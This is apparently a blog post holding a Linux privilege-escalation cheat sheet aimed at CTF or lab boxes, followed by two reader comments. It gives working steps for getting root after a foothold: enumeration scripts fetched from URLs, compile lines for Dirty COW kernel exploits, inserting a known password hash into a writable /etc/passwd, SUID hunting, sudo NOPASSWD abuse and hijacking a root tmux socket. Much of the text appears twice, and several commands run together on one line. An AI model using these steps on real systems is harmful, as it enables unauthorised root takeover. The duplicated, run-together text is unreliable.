Steps to Follow after an initial Foothold is found on a linux OS.
Commands
uname -a
cat /etc/passwd
whoami
sudo -l
32bit or 64bit?
execute:
arch
file /sbin/init
uname -a ( x_64 = 64bit) (i386 or i686 = 32bit)
Look in the home directory of the user "ls -lAR", do you find "motd.legal-displayed"
if so it maybe vulnerable to "Exploit-DB 14339"
Run Scripts
LinEnum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
Linuxprivchecker
http://www.securitysift.com/download/linuxprivchecker.py
Priv'esc check (Pentest Monkeys)
http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz
Kernel Exploits
What is the version of the Kernel (uname -a)
2.6.x -> 3.9 try DIRTY COW first (searchsploit 2.6 cow) (try first 40616.c)
compile locally(dont try to use -m32 on an 64 bit box for this exploit)
else
https://www.exploit-db.com/exploits/40839/
32bit - gcc -pthread 40839.c -o 40839-32 -lcrypt -m32
64bit - gcc -pthread 40839.c -o 40839-64 -lcrypt
2.6.x --> then "searchsploit 2.6.x)
What files are word readable?
-------------------------------------------------------------------------------------------------
If /etc/passwd is..
Then add an encrypted version of a password then run it against the root user.
openssl passwd sp00ks
dhaczA9zC7C5k
so now we copy dhaczA9zC7C5k to the root users passwd line like so...
root:dhaczA9zC7C5k:0:0:root:/root:/bin/bash
and now we can do
# su
sp00ks
root@BOX:~# id
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------------------------------------------
Check SUID
SUID - at least one should work if not all of them.
Running SUDO permission without a password
Commands
uname -a
cat /etc/passwd
whoami
sudo -l
32bit or 64bit?
execute:
arch
file /sbin/init
uname -a ( x_64 = 64bit) (i386 or i686 = 32bit)
Look in the home directory of the user "ls -lAR", do you find "motd.legal-displayed"
if so it maybe vulnerable to "Exploit-DB 14339"
Run Scripts
LinEnum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
Linuxprivchecker
http://www.securitysift.com/download/linuxprivchecker.py
Priv'esc check (Pentest Monkeys)
http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz
Kernel Exploits
What is the version of the Kernel (uname -a)
2.6.x -> 3.9 try DIRTY COW first (searchsploit 2.6 cow) (try first 40616.c)
compile locally(dont try to use -m32 on an 64 bit box for this exploit)
else
https://www.exploit-db.com/exploits/40839/
32bit - gcc -pthread 40839.c -o 40839-32 -lcrypt -m32
64bit - gcc -pthread 40839.c -o 40839-64 -lcrypt
2.6.x --> then "searchsploit 2.6.x)
What files are word readable?
-------------------------------------------------------------------------------------------------
If /etc/passwd is..
Then add an encrypted version of a password then run it against the root user.
openssl passwd sp00ks
dhaczA9zC7C5k
so now we copy dhaczA9zC7C5k to the root users passwd line like so...
root:dhaczA9zC7C5k:0:0:root:/root:/bin/bash
and now we can do
# su
sp00ks
root@BOX:~# id
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------------------------------------------
Check SUID
SUID - at least one should work if not all of them.
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/nullfind / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/null
Example Vulnerable file
-rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency
We see the "s" is set for sticky and that it is executable by everyone!
So now run it "./var/htb/emergency" and you should have root
#whoamiroot---------------------------------------------------------------Running SUDO permission without a password
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
In this example as this is a user not a file, we can execute as user "scriptmanager"without specifying a password.
www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/dev/shm$
---------------------------------------------------------------searchsploit
What services are listening on localhost or 127.0.0.1?
---------------------------------------------------------------
Process List (ps -aux)Tmux session running as root????:~$ ps -aux | grep tmux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root 1023 0.0 0.1 26416 1672 ? Ss Nov04 0:10 /usr/bin/tmux -S /.devs/dev_sess Connect to it - "tmux -S /.devs/dev_sess"--------------------------------------------------------------
Noob here sir. needs more explaination
ReplyDeleteAnd can I use it on Termux?
ReplyDelete